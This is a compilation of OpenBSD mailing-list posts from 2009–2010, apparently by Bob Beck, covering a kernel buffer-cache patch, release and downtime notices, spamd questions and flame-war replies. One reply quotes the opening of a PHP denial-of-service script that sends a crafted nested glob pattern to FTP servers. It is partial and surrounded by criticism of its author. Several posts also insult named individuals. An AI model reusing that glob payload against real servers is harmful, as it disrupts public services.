Are you able to try the following? see if it solves your problem.


Index: sys/kern/vfs_bio.c
===
RCS file: /cvs/src/sys/kern/vfs_bio.c,v
retrieving revision 1.126
diff -u -r1.126 vfs_bio.c
--- sys/kern/vfs_bio.c  3 Aug 2010 06:30:19 -   1.126
+++ sys/kern/vfs_bio.c  5 Nov 2010 17:32:44 -
@@ -672,21 +672,10 @@
 */
if (!ISSET(bp-b_flags, B_DELWRI)) {
SET(bp-b_flags, B_DELWRI);
-   bp-b_synctime = time_uptime + 35;
s = splbio();
reassignbuf(bp);
splx(s);
curproc-p_stats-p_ru.ru_oublock++;/* XXX */
-   } else {
-   /*
-* see if this buffer has slacked through the syncer
-* and enforce an async write upon it.
-*/
-   if (bp-b_synctime  time_uptime) {
-   bawrite(bp);
-   return;
-   }
-   }

/* If this is a tape block, write the block now. */
if (major(bp-b_dev)  nblkdev 
@@ -727,7 +716,6 @@

if (ISSET(bp-b_flags, B_DELWRI) == 0) {
SET(bp-b_flags, B_DELWRI);
-   bp-b_synctime = time_uptime + 35;
reassignbuf(bp);
}
 }


On 3 November 2010 05:17, Michay Koc m...@prime.pl wrote:
 Hi All,

 I've just upgraded two of my OpenBSD machines to 4.8:

 hw.machine=i386
 hw.model=Intel(R) Core(TM)2 Duo CPU E8400 @ 3.00GHz (GenuineIntel
 686-class)
 hw.product=DG31PR

 and

 hw.machine=i386
 hw.model=Intel(R) Atom(TM) CPU D510 @ 1.66GHz (GenuineIntel 686-class)
 hw.product=D510MO

 Dmesgs are below.

 The problem is that they freeze every time I try to:
 - rsync two local filesystems on different physical disks - high disk IO -
 about 30GB
 - run nagios with about 900 probes - hight network IO and ndcpy like 3000
in
 systat, lots of forks, load average raising to 5 and above

 High disk IO freeze occurs about 30 seconds after rsync start and is
 permanent.
 High network IO freeze occurs several minutes after nagios start and
 sometimes machines are responsive for limited time. Pkill nagios resolves
 the problem, machine becomes responsive.

 In both cases machines behind nat still have internet connectivity.

 Local services like ssh or console are unavailable.

 Snapshot from 2010-11-02 22:51:00 does not resolve the issue.

 The Atom machine freezes much faster than Core2Duo.

 any help appreciated

 best regards
 M.K.



 Core2Duo dmesg:

 OpenBSD 4.8 (GENERIC.MP) #359: Mon Aug 16 09:16:26 MDT 2010
dera...@i386.openbsd.org:/usr/src/sys/arch/i386/compile/GENERIC.MP
 cpu0: Intel(R) Core(TM)2 Duo CPU E8400 @ 3.00GHz (GenuineIntel 686-class)
 3.01 GHz
 cpu0:

FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUS
H,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS-CPL,VMX,SMX,EST,TM2,S
SSE3,CX16,xTPR,PDCM,SSE4.1
 real mem  = 3476889600 (3315MB)
 avail mem = 3410038784 (3252MB)
 mainbus0 at root
 bios0 at mainbus0: AT/286+ BIOS, date 02/27/08, SMBIOS rev. 2.4 @ 0xe8170
 (42 entries)
 bios0: vendor Intel Corp. version PRG3110H.86A.0047.2008.0227.1745 date
 02/27/2008
 bios0: Intel Corporation DG31PR
 acpi0 at bios0: rev 2
 acpi0: sleep states S0 S1 S3 S4 S5
 acpi0: tables DSDT FACP APIC HPET MCFG
 acpi0: wakeup devices P0P1(S3) PS2K(S3) PS2M(S3) UAR1(S3) P0P2(S4) USB0(S3)
 USB1(S3) USB2(S3) USB3(S3) EUSB(S3) MC97(S4) PEX0(S4) PEX1(S4) PEX2(S4)
 PEX3(S4) SLPB(S4) PWRB(S3)
 acpitimer0 at acpi0: 3579545 Hz, 24 bits
 acpimadt0 at acpi0 addr 0xfee0: PC-AT compat
 cpu0 at mainbus0: apid 0 (boot processor)
 cpu0: apic clock running at 333MHz
 cpu1 at mainbus0: apid 1 (application processor)
 cpu1: Intel(R) Core(TM)2 Duo CPU E8400 @ 3.00GHz (GenuineIntel 686-class)
 3 GHz
 cpu1:

FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUS
H,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,DS-CPL,VMX,SMX,EST,TM2,S
SSE3,CX16,xTPR,PDCM,SSE4.1
 ioapic0 at mainbus0: apid 0 pa 0xfec0, version 20, 24 pins
 acpihpet0 at acpi0: 14318179 Hz
 acpiprt0 at acpi0: bus 0 (PCI0)
 acpiprt1 at acpi0: bus 4 (P0P2)
 acpiprt2 at acpi0: bus 2 (PEX0)
 acpiprt3 at acpi0: bus 3 (PEX1)
 acpiprt4 at acpi0: bus -1 (PEX2)
 acpiprt5 at acpi0: bus -1 (PEX3)
 acpicpu0 at acpi0:, C3, C2, C1, PSS
 acpicpu1 at acpi0:, C3, C2, C1, PSS
 acpibtn0 at acpi0: SLPB
 acpibtn1 at acpi0: PWRB
 bios0: ROM list: 0xc/0xb400!
 cpu0: Enhanced SpeedStep 3000 MHz: speeds: 2997, 1998 MHz
 pci0 at mainbus0 bus 0: configuration mode 1 (bios)
 pchb0 at pci0 dev 0 function 0 Intel 82G33 Host rev 0x10
 ppb0 at pci0 dev 1 function 0 Intel 82G33 PCIE rev 0x10: apic 0 int 16
 (irq 11)
 pci1 at ppb0 bus 1
 vga1 at pci0 dev 2 function 0 Intel 82G33 Video rev 0x10
 wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
 wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
 intagp0 at vga1
 agp0 at intagp0: aperture at 0xd000, size 

Re: Same shit all over again

[Bob Beck]

 Well, tinyurl redirects to my box which redirects to trollaxer.  Here is
 the culprit log for falling for such a silly trick.

 83.101.24.229 - - [15/Aug/2010:19:13:12 -0400] GET /why.html HTTP/1.1
 200 136 - Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.0.11)
 Gecko/2009070118 Firefox/3.0.11

 # host kd85.com
 kd85.com has address 83.101.24.229

 # cat why.html
 html
 head
meta http-equiv=refresh
 content=0;url=http://www.trollaxor.com/2010/06/why-i-left-openbsd.html; /
 /head

 /html

Nicely done David - I'm very impressed - as you know I mentioned
before this on hackers that this sounded very kd85 like - and you
confirmed my suspicions very effectively.

Any time I see someone talking about commit bits I think of this and
laugh - as this is someone who has never done a commit to OpenBSD.

The lies in the message that was sent are pretty good to - Were we in
the middle of a release cycle - were people cranky? Yes, absolutely -
you know what - sane people have disagreements - all the time.

however.

Machines were not turned off.

Everyone still had access to what they were doing

Was the tree locked? yes - as problems have been found in test and
need to be fixed. It's still locked - but we'll ship a good release
for that.

The priceless one is how the wim calls for a vote - yeah - that
works real well for netbsd.

and is also signing his messages H and R to decieve  people as to
the real identity and to foster suspicion within the community I find
that particularly reprehensible - but not surprising. Nothing could
surpirse me from this source anymore. I get the impression that this
sort of behaviour is normal from Wim - it seems to make the same
amount of sense as kd85's normal business practices - Sorry I can't go
along with that. I pay my taxes, and I pay for my own house with my
own money.  I encourage Wim to fork his own project that will be run
and funded fully, and openly, and accountable to all involved. I'm
sure it will be a resounding success.

Re: Same shit all over again

[Bob Beck]

Theo has been back for  a day already. and like the rest of a lot of
us, is trying to get a test and release cycle out the door to ship a
release - that means we have better things to do than entertain misc@
by responding to Wim's  idiotic bullshit.

Wanna help? go install snapshots on as many different things as you
can and tell us if you see any problems. That's a much more useful
activity than watching misc@ for trolls. Pop popcorn with the waste
heat of all the machines you are spinning up.



On 16 August 2010 10:46, Bryan Irvine sparcta...@gmail.com wrote:
 Will someone warn me 2 minutes before Theo gets back?  I'd like to
 have some popcorn ready.   :-)




 On Mon, Aug 16, 2010 at 9:27 AM, Bob Beck b...@ualberta.ca wrote:
 Well, tinyurl redirects to my box which redirects to trollaxer.  Here is
 the culprit log for falling for such a silly trick.

 83.101.24.229 - - [15/Aug/2010:19:13:12 -0400] GET /why.html HTTP/1.1
 200 136 - Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.0.11)
 Gecko/2009070118 Firefox/3.0.11

 # host kd85.com
 kd85.com has address 83.101.24.229

 # cat why.html
 html
 head
meta http-equiv=refresh
 content=0;url=http://www.trollaxor.com/2010/06/why-i-left-openbsd.html;
 /
 /head

 /html

 Nicely done David - I'm very impressed - as you know I mentioned
 before this on hackers that this sounded very kd85 like - and you
 confirmed my suspicions very effectively.

 Any time I see someone talking about commit bits I think of this and
 laugh - as this is someone who has never done a commit to OpenBSD.

 The lies in the message that was sent are pretty good to - Were we in
 the middle of a release cycle - were people cranky? Yes, absolutely -
 you know what - sane people have disagreements - all the time.

 however.

 Machines were not turned off.

 Everyone still had access to what they were doing

 Was the tree locked? yes - as problems have been found in test and
 need to be fixed. It's still locked - but we'll ship a good release
 for that.

 The priceless one is how the wim calls for a vote - yeah - that
 works real well for netbsd.

 and is also signing his messages H and R to decieve  people as to
 the real identity and to foster suspicion within the community I find
 that particularly reprehensible - but not surprising. Nothing could
 surpirse me from this source anymore. I get the impression that this
 sort of behaviour is normal from Wim - it seems to make the same
 amount of sense as kd85's normal business practices - Sorry I can't go
 along with that. I pay my taxes, and I pay for my own house with my
 own money.  I encourage Wim to fork his own project that will be run
 and funded fully, and openly, and accountable to all involved. I'm
 sure it will be a resounding success.

Re: libc/glob(3) DoS PoC for ftp.openbsd.org and ftp.netbsd.org

[Bob Beck]

It's rather astonishing what attempts to passfor a credible security
advisory today.

oh, I made a lot of connections to the site and they blocked me.

Thank you, Maksymillian, for showing us all that you can execute a
denial of service attack from 90.156.82.13.

I wonder how many connections his site supports to his services. perhaps some
similar security expert can test his connection rate and let us all know.

# traceroute  -n 90.156.82.13
traceroute to 90.156.82.13 (90.156.82.13), 64 hops max, 40 byte packets
 1  129.128.5.2  6.906 ms  0.818 ms  1.444 ms
 2  129.128.3.194  0.306 ms  0.303 ms  0.306 ms
 3  129.128.3.130  0.345 ms  0.502 ms  0.656 ms
 4  129.128.3.170  0.502 ms  0.726 ms  1.443 ms
 5  64.42.209.114  5.628 ms  5.562 ms  5.272 ms
 6  216.18.32.13  6.337 ms  5.676 ms  5.752 ms
 7  66.59.190.198  18.936 ms  19.18 ms  18.523 ms
 8  66.59.190.18  18.384 ms  18.659 ms  18.426 ms
 9  67.69.199.105  17.797 ms  17.785 ms  18.111 ms
10  64.86.115.13  17.369 ms  17.651 ms  17.175 ms
11  216.6.98.29  68.828 ms  69.162 ms  69.146 ms
12  216.6.57.9  87.943 ms  87.828 ms  87.879 ms
13  195.219.69.29  175.930 ms  176.47 ms  175.804 ms
14  195.219.69.2  189.366 ms  176.757 ms  179.460 ms
15  195.219.180.6  193.562 ms  197.755 ms  197.880 ms
16  195.219.246.2  181.461 ms  201.536 ms  179.635 ms
17  83.238.251.56  177.432 ms  177.971 ms  177.115 ms
18  83.238.250.38  189.741 ms  190.70 ms  189.646 ms
19  83.238.250.12  191.123 ms  193.99 ms  192.135 ms
20  83.238.251.41  189.843 ms  189.805 ms  189.245 ms
21  87.204.248.202  188.981 ms  189.167 ms  459.987 ms
22  87.99.33.90  190.739 ms  190.637 ms  190.955 ms
23  87.99.32.202  190.180 ms  190.271 ms  190.160 ms
24  90.156.82.13  289.39 ms  331.276 ms  319.419 ms
^C
# host 90.156.82.13
13.82.156.90.in-addr.arpa domain name pointer 90-156-82-13.magma-net.pl.
#




On 2 July 2010 15:47, Theo de Raadt dera...@cvs.openbsd.org wrote:
 OK, I am letting the maintainer of the site know, at the University Campus
 that you have just executed a denial of service against.

 I am surprised that you would go out of your way to declare so freely
 that you have purposely participated in a denial of service.

 Return-Path: c...@securityreason.com
 Delivery-Date: Fri Jul  2 15:38:24 2010
 Received: from shear.ucar.edu (lists.openbsd.org [192.43.244.163])
   by cvs.openbsd.org (8.14.3/8.12.1) with ESMTP id o62LcNgR016472
   (version=TLSv1/SSLv3 cipher=DHE-DSS-AES256-SHA bits=256 verify=FAIL)
   for dera...@cvs.openbsd.org; Fri, 2 Jul 2010 15:38:24 -0600 (MDT)
 Received: from v117864.home.net.pl (v117864.home.net.pl [89.161.252.8])
   by shear.ucar.edu (8.14.3/8.14.3) with SMTP id o62LcG20025931
   for dera...@openbsd.org; Fri, 2 Jul 2010 15:38:17 -0600 (MDT)
 Received: from 90-156-82-13.magma-net.pl [90.156.82.13] (HELO [127.0.0.1])
  by securityreason.home.pl [89.161.252.8] with SMTP (IdeaSmtpServer v0.70)
  id a6e20078b871f388; Fri, 2 Jul 2010 22:38:15 +0200
 Message-ID: 4c2e4e40.4080...@securityreason.com
 Date: Fri, 02 Jul 2010 22:38:24 +0200
 From: Maksymilian Arciemowicz c...@securityreason.com
 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.10)
Gecko/20100512 Thunderbird/3.0.5
 MIME-Version: 1.0
 To: dera...@openbsd.org, secur...@openbsd.org
 Subject: libc/glob(3) DoS PoC for ftp.openbsd.org and ftp.netbsd.org
 X-Enigmail-Version: 1.0.1
 Content-Type: text/plain; charset=ISO-8859-1
 Content-Transfer-Encoding: 7bit

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 ?php

 /* Libc/glob(3) denial-of-service
 Maksymilian Arciemowicz from SecurityReason.com

 This script has been used to attack ftp.openbsd.org and ftp.netbsd.org

 Result (ftp.openbsd.org):
 - - Connection refused

 and in the end

 # telnet ftp.openbsd.org 21
 Trying 129.128.5.191...
 Connected to ftp.openbsd.org.
 Escape character is '^]'.
 421-  If you are seeing this message you have been blocked from using
 421- this ftp server - most likely for mirroring content without paying
 421- attention to what you were mirroring or where you should be mirroring
 421- it from, or for excessive connection rates.
 421- OpenBSD should *NOT* be mirrored from here, you should use
 421- a second level mirror as described in http://www.openbsd.org/ftp.html
 421

 Connection closed by foreign host.
 #

 ;]

 Result (ftp.netbsd.org):
 - - no more access for anonymous

 On 02.07.2010 20:29 CET, ftp.netbsd.org has return:
 530 User ftp access denied, connection limit of 160 reached.


 Affter attack from one host

 */

 $conf['host']= $argv[1] ? $argv[1] : HOST;
 $conf['user'] =$argv[2] ? $argv[2] : anonymous;
 $conf['pass'] =$argv[3] ? $argv[3] : m...@cxib.net;
 $conf['port']= $argv[4] ? $argv[4] : 21;

 $dirnames=array('A', 'B', 'C', 'D',
 'E','F','G','H','I','J','K','M','N','O','P');

$pathsent={..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{
..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*c
x;

 // fts_levelsumary
 $fts_level=2;

 

OpenBSD 4.7 Released, May 19 2010

[Bob Beck]

.  During installation, you can install
X.Org quite easily.  Be sure to try out xdm(1) and see how we have
customized it for OpenBSD.
The OpenBSD ports tree contains automated instructions for building
third party software.  The software has been verified to build and
run on the various OpenBSD architectures.  The 4.7 ports collection,
including many of the distribution files, is included on the 3-CD
set.  Please see the PORTS file for more information.

Note: some of the most popular ports, e.g., the Apache web server
and several X applications, come standard with OpenBSD.  Also, many
popular ports have been pre-compiled for those who do not desire
to build their own binaries (see BINARY PACKAGES, below).
A large number of binary packages are provided.  Please see the PACKAGES
file (ftp://ftp.OpenBSD.org/pub/OpenBSD/4.7/PACKAGES) for more details.
The CD-ROMs contain source code for all the subsystems explained
above, and the README (ftp://ftp.OpenBSD.org/pub/OpenBSD/4.7/README)
file explains how to deal with these source files.  For those who
are doing an FTP install, the source code for all four subsystems
can be found in the pub/OpenBSD/4.7/ directory:

xenocara.tar.gz ports.tar.gz   src.tar.gz sys.tar.gz
Ports tree and package building by Jasper Lievisse Adriaanse, Michael Erdely,
Simon Bertrang, Stuart Henderson, Antoine Jacoutot, Robert Nagy,
Nikolay Sturm, and Christian Weisgerber.  System builds by Theo de Raadt,
Mark Kettenis, and Miod Vallat.  X11 builds by Todd Fries and Miod Vallat.
ISO-9660 filesystem layout by Theo de Raadt.

We would like to thank all of the people who sent in bug reports, bug
fixes, donation cheques, and hardware that we use.  We would also like
to thank those who pre-ordered the 4.7 CD-ROM or bought our previous
CD-ROMs.  Those who did not support us financially have still helped
us with our goal of improving the quality of the software.

Our developers are:

Alexander Bluhm, Alexander Hall, Alexander von Gernler,
Alexander Yurchenko, Alexandre Ratchov, Alexey Vatchenko,
Anders Magnusson, Andreas Gunnarsson, Anil Madhavapeddy,
Antoine Jacoutot, Ariane van der Steldt, Artur Grabowski,
Austin Hook, Benoit Lecocq, Bernd Ahlers, Bob Beck, Bret Lambert,
Can Erkin Acar, Chad Loder, Charles Longeau, Chris Kuethe,
Christian Weisgerber, Claudio Jeker, Dale Rahn, Damien Bergamini,
Damien Miller, Dariusz Swiderski, Darren Tucker,
David Gwynne,  David Hill, David Krause, Edd Barrett, Eric Faurot,
Esben Norby,  Fabien Romano, Federico G. Schwindt, Felix Kronlage,
Gilles Chehade, Giovanni Bechis, Gordon Willem Klok, 
Henning Brauer, Ian Darwin, Igor Sobrado, Ingo Schwarze,
Jacek Masiulaniec, Jacob Meuser, Jakob Schlyter, Janne Johansson,
Jared Yanovich, Jason Dixon, Jason George, Jason McIntyre,
Jason Meltzer, Jasper Lievisse Adriaanse, Jim Razmus II, Joel Sing,
Joerg Goltermann, Johan Mson Lindman, Jolan Luff, Jonathan Armani,
Jonathan Gray, Jordan Hargrave, Joshua Stein, Kenneth R Westerback,
Kevin Lo, Kevin Steves, Kjell Wooding, Kurt Miller, Landry Breuil,
Laurent Fanis, Marc Espie, Marco Peereboom, Marco Pfatschbacher,
Marco S Hyman, Marcus Glocker, Marek Vasut, Mark Kettenis,
Mark Uemura, Markus Friedl, Martin Reindl, Martynas Venckus,
Mathieu Sauve-Frankel, Mats O Jansson, Matthias Kilian,
Matthieu Herrb, Michael Erdely, Michael Knudsen, Michele Marchetto,
Mike Larkin, Miod Vallat, Moritz Grimm, Moritz Jodeit,
Nicholas Marriott, Nick Holland, Nikolay Sturm, Okan Demirmen,
Oleg Safiullin, Otto Moerbeek, Owain Ainsworth, Paul de Weerd,
Paul Irofti, Peter Hessler, Peter Stromberg, Peter Valchev,
Philip Guenther, Pierre-Emmanuel Andre, Pierre-Yves Ritschard,
Rainer Giedat, Reyk Floeter, Robert Nagy, Rui Reis,
Ryan Thomas McBride, Simon Bertrang, Simon Perreault, Stefan Kempf,
Stefan Sperling, Stephan A. Rickauer, Steven Mestdagh,
Stuart Henderson, Takuya Asada, Ted Unangst, Theo de Raadt,
Thordur I Bjornsson, Tobias Stoeckmann, Tobias Weingartner,
Todd C. Miller, Todd Fries, Will Maier, William Yodlowsky,
Xavier Santolaria, Yasuoka Masahiko, Yojiro Uo

Re: OpenBSD 4.7 Released, May 19 2010

[Bob Beck]

 Congratulations but I can't find a mirror with the release

Did you read the entire message, in that was:
---8--
1) Read either of the following two files for a list of ftp
  mirrors which provide OpenBSD, then choose one near you:

   http://www.OpenBSD.org/ftp.html
   ftp://ftp.OpenBSD.org/pub/OpenBSD/4.7/ftplist

  As of May 19, 2010, the following ftp mirror sites have the 4.7 release:

   ftp://ftp.eu.openbsd.org/pub/OpenBSD/4.7/   Stockholm, Sweden
   ftp://ftp.bytemine.net/pub/OpenBSD/4.7/ Oldenburg, Germany
   ftp://mirror.aarnet.edu.au/pub/OpenBSD/4.7/ Brisbane, Australia
   ftp://ftp.wu-wien.ac.at/pub/OpenBSD/4.7/Vienna, Austria
   ftp://ftp.usa.openbsd.org/pub/OpenBSD/4.7/  CO, USA
   ftp://ftp5.usa.openbsd.org/pub/OpenBSD/4.7/ CA, USA
   ftp://obsd.cec.mtu.edu/pub/OpenBSD/4.7/ Michigan, USA

   The release is also available at the master site:

   ftp://ftp.openbsd.org/pub/OpenBSD/4.7/  Alberta, Canada

   However it is strongly suggested you use a mirror.

  Other mirror sites may take a day or two to update.
---8--

so I find it somewhat difficult to believe you could not find a mirror.

Perhaps OpenBSD is not for you.

Re: OpenBSD 4.7 Released, May 19 2010

[Bob Beck]

well, that looks a bit screwed, since it lists ftp.openbsd.org as not
having everything :)


On 19 May 2010 12:19, Stuart Henderson s...@spacehopper.org wrote:
 On 2010-05-19, Jorge Medina jo...@bsdchile.cl wrote:
 Congratulations but I can't find a mirror with the release

 http://spacehopper.org/up2date.html

wwww.openbsd.org//ftp.openbsd.org downtime - Sunday Mar 21, 0800-1530 MDT

[Bob Beck]

Hey gang

The University of Alberta is having a large scale electrician party in
our data center on Sunday Mar 21 to bring more
power into it. As a result we'll be without cooling for the duration.

Expect ftp/www.openbsd.org along with anoncvs1.ca.openbsd.org and the
web/ftp fanout machines to be
unavailable for this period. Don't be surprised when we drop off the
world for a little while on Sunday.

If all goes well we should be back by 15:30  MDT (likely before)

-Bob

Re: observed spamd behavior

[Bob Beck]

2010/1/7  open...@noid.net:
 In the absence of any feedback, I would say that I have two feature
 requests for spamd (Bob, are you out there?):

  1) Detect '500 5.5.1 Command unrecognized' loops, and when found,
 start to gap response times with an increasing delay.

  2) When a client does not wait for spamd's 220 opening message to
 complete before sending, greytrap that client.

I'll take a look at both.

-Bob



 Thanks for your consideration.

 - Tor


 On Sat, Jan 02, 2010 at 03:15:03PM -0800, open...@noid.net wrote:
 Hello,

 I've got spamd working well (it's very cool!)...

 Sometimes I see in pftop a state entry that shows spamd has a very old
 connection that is actively still passing traffic (lasts for hours)...

 I was able to capture one of these as it began (using tcpdump).
 Here's what the trace shows (in distilled SMTP):

   send: 220 my
   recv: EHLO bogon.domain.com\r\n
   send:   host.domain.net ESMTP MTA; Mon Dec 28 07:55:59 2009\r\n
   send: 250 Hello, spam sender. Pleased to be wasting your time.\r\n
   recv: HELO bogon.domain.com\r\n
   send: 500 5.5.1 Command unrecognized\r\n
   recv: \r\n
   send: 500 5.5.1 Command unrecognized\r\n
   recv: \r\n
   send: 500 5.5.1 Command unrecognized\r\n
   recv: \r\n

   ... etc, approximately two 5.5.1 errors per second

 This client sends it's EHLO before waiting for spamd to complete
 sending it's 220 opening message.  I try to show that above using an
 indentation on the third line (the second send line).  In fact, spamd
 is doing it's normal trick of stuttering out the 220 opening message
 one char per packet...

 I think spamd's state table is correct in not allowing the SMTP
 session to reset upon receiving the subsequent HELO.  My questions
 are as follows:

 Should spamd start to reduce bandwidth for a session by extending
 reply times after some trigger like too many errors sent or too much
 time spent...?

 When a client sends it's EHLO (or anything at all) before waiting for
 the server's 220 opening message to complete, is that not grounds for
 immediate greytrapping?  I do not think spamd enforces that at the
 moment.  This would be similar to sendmail's FEATURE(`greet_pause') in
 that there would be a penalty for such misbehavior...

 Thanks for your consideration.

 - Tor

Re: spamd.conf format

[Bob Beck]

2009/12/21 Nick Berg nickb...@gmail.com:
 From the spamd.conf manual:

   The format of the list of addresses is expected to consist of one network
   block or address per line (optionally followed by a space and text that
   is ignored).  Comment lines beginning with # are ignored.  Network blocks
   may be specified in any of the formats as in the following example:

   # CIDR format
   192.168.20.0/24
   # A start - end range
   192.168.21.0 - 192.168.21.255
   # As a single IP address
   192.168.23.1

 Given the condition that an entry followed by a space has the
 remaining text ignored, would that not invalidate the start - end
 range entry?  Should that not get interpreted as:

no. because a range entry is still an entry.


   192.168.21.0 #comment starts here

 On that note, if a space after an entry denotes the start of ignored
 text, will Spamhaus' DROP list http://www.spamhaus.org/drop/drop.lasso
 get parsed correctly, or should that get run through sed to strip out
 everything after a semicolon?  Its format:

   ; Spamhaus DROP List 12/22/09 - (c) 2009 The Spamhaus Project
   110.44.0.0/20 ; SBL74731
   116.199.128.0/19 ; SBL56563
   119.42.144.0/21 ; SBL70035
   120.143.128.0/21 ; SBL67396
   121.46.64.0/18 ; SBL72673
   128.168.0.0/16 ; SBL51908

that first line with the semicolon list will not parse.

Re: Web Browsers

[Bob Beck]

2009/12/18 nixlists nixmli...@gmail.com:
 On Fri, Dec 18, 2009 at 9:07 PM, Marco Peereboom sl...@peereboom.us wrote:
 firefox + adsuck

 What is your opnion on Chrome, OpenBSD gurus? Okay we all know about
 it's privacy and identity leakage concerns. It's designed by Google
 with this built-in - they want to know everything about you and don't
 care about your privacy, yada yada. But what about its supposedly more
 secure multi-process design. Is it really better than Firefox and
 others in this regard?



Well, in theory, if they can stick to it, a privsep design is more
secure from the point of view of the application.

When done right.

Now, is it a small and secure program? I dunno: You decide:



# uname -a
OpenBSD cthulhu.cns.ualberta.ca 4.6 GENERIC.MP#27 amd64
# pwd
/usr/local/chrome
# ldd chrome
chrome:
StartEnd  Type Open Ref GrpRef Name
0040 02c9f000 exe  10   0  chrome
000209b99000 00020a0cc000 rlib 014   0
/usr/X11R6/lib/libX11.so.12.0
000210dbf000 0002111c8000 rlib 07   0
/usr/X11R6/lib/libXrender.so.5.0
0002069ca000 000206ddb000 rlib 07   0
/usr/X11R6/lib/libXext.so.10.0
000212468000 000212877000 rlib 01   0
/usr/local/lib/libexecinfo.so.0.0
00021037f000 000210bab000 rlib 01   0
/usr/local/lib/libgtk-x11-2.0.so.1402.0
0002111f4000 0002116aa000 rlib 02   0
/usr/local/lib/libgdk-x11-2.0.so.1402.0
000214671000 000214a8c000 rlib 03   0
/usr/local/lib/libgdk_pixbuf-2.0.so.1402.0
00020449 00020489d000 rlib 03   0
/usr/local/lib/libpangocairo-1.0.so.1801.0
00020a66 00020aa62000 rlib 03   0
/usr/X11R6/lib/libXinerama.so.5.0
00020ff75000 00021037f000 rlib 03   0
/usr/X11R6/lib/libXi.so.10.1
0002058fc000 000205d04000 rlib 03   0
/usr/X11R6/lib/libXrandr.so.6.1
00020db06000 00020df1 rlib 03   0
/usr/X11R6/lib/libXcursor.so.4.0
0002029e5000 000202de8000 rlib 03   0
/usr/X11R6/lib/libXcomposite.so.3.0
000202e4d000 00020325 rlib 03   0
/usr/X11R6/lib/libXdamage.so.3.1
0002065c 0002069c5000 rlib 06   0
/usr/X11R6/lib/libXfixes.so.5.0
000211fc2000 0002123e rlib 02   0
/usr/local/lib/libatk-1.0.so.2800.0
00020ce25000 00020d2b rlib 04   0
/usr/local/lib/libcairo.so.9.2
000213dfc000 000214236000 rlib 05   0
/usr/X11R6/lib/libpixman-1.so.15.8
00020976e000 000209b99000 rlib 05   0
/usr/local/lib/libglitz.so.2.0
00020df1 00020e338000 rlib 01   0
/usr/local/lib/libpng.so.9.0
00020efb6000 00020f3d2000 rlib 015   0
/usr/X11R6/lib/libxcb.so.2.0
000205d04000 000206105000 rlib 016   0
/usr/X11R6/lib/libpthread-stubs.so.0.0
00020d532000 00020d935000 rlib 016   0
/usr/X11R6/lib/libXau.so.9.0
0002130c2000 0002134c7000 rlib 016   0
/usr/X11R6/lib/libXdmcp.so.10.0
000207434000 0002078e1000 rlib 04   0
/usr/local/lib/libgio-2.0.so.1802.0
0002156c4000 000215af4000 rlib 04   0
/usr/local/lib/libpangoft2-1.0.so.1801.0
000204a99000 000204ee3000 rlib 05   0
/usr/local/lib/libpango-1.0.so.1801.0
00020610a000 00020654a000 rlib 012   0
/usr/local/lib/libgobject-2.0.so.1802.0
   00020c7da000 00020cbdd000 rlib 010   0
/usr/local/lib/libgmodule-2.0.so.1802.0
00020eb7a000 00020efb1000 rlib 06   0
/usr/X11R6/lib/libfontconfig.so.6.0
000204ee3000 000205307000 rlib 07   0
/usr/lib/libexpat.so.9.0
000209038000 0002094ba000 rlib 07   0
/usr/X11R6/lib/libfreetype.so.17.0
000214a8c000 000214ea rlib 08   0
/usr/lib/libz.so.4.1
0002079f7000 000207dfb000 rlib 03   0
/usr/local/lib/libgthread-2.0.so.1802.0
00020fa0e000 00020fed7000 rlib 015   0
/usr/local/lib/libglib-2.0.so.1802.0
000203e02000 00020420d000 rlib 016   0
/usr/local/lib/libintl.so.4.0
00020326b000 000203764000 rlib 017   0
/usr/local/lib/libiconv.so.6.0
00020b96a000 00020bea5000 rlib 03   0
/usr/local/lib/libnss3.so.24.0
000212c95000 0002130c2000 rlib 01   0
/usr/local/lib/libsmime3.so.24.0
0002116aa000 000211af rlib 01   0
/usr/local/lib/libsoftokn3.so.24.0
00020e73c000 00020eb75000 rlib 01   0
/usr/local/lib/libssl3.so.24.0
0002152c1000 0002156c4000 rlib 06   0
/usr/local/lib/libplds4.so.21.0
00020e338000 00020e73c000 rlib 06   0
/usr/local/lib/libplc4.so.21.0
000206de 000207219000 rlib 08   0

Re: OT: Have you hugged your local OpenBSD dev lately?

[Bob Beck]

 From past experience, I would expect much waving of hands over a two
 weeks periods, with lots of expert telling you It's a complicated problem,
 running around in circle finding even MORE complicated problems to solve,
 and then things going back to its general state of apathy with respect
 to security issues.

I don't believe it's apathy, as much as a realization that in general,
the focus of the developers will always be on speed and eye candy to
the expense of all else, including stability and security.

As such we concentrate on looking at things that can mitigate
somewhat, at least in the saner cases, such as when it is not an
accellerated driver with full access to the machine. Then we at least
have some more secure by default options.

The fact is though, Monsterously accellerated X with full access to
the machine hardware bypasseses much of the security protection
openbsd provides.  Do some people want/need it? sure. but they sould
do so understanding that they are incurring a greater risk by using
it. in this manner.

Re: OT: Have you hugged your local OpenBSD dev lately?

[Bob Beck]

 The Journal Of Child Psychology And Psychiatry has concluded that an
 estimated 98 percent of children under the age of 10 are remorseless
 sociopaths with little regard for anything other than their own egocentric
 interests and pleasures.

 http://www.theonion.com/content/news/new_study_reveals_most_children

 I just don't think in this case here that it is limited to Children only.
 (;

The people who publish such research, and those that read it and find
it novel have obviously never been parents themselves, or even
someone's boss.

People are at the core motivated by their own self-interest.  Anyone
who says they aren't is selling something.

Re: OT: Have you hugged your local OpenBSD dev lately?

[Bob Beck]

 | People are at the core motivated by their own self-interest.  Anyone
 | who says they aren't is selling something.

 Yes, they're selling hilarity. It's The Onion, after all.

Yes, but it's funny because it's true.  Even OpenBSD developers are
motivated by self interest...Ever wonder why the answers on misc@ are
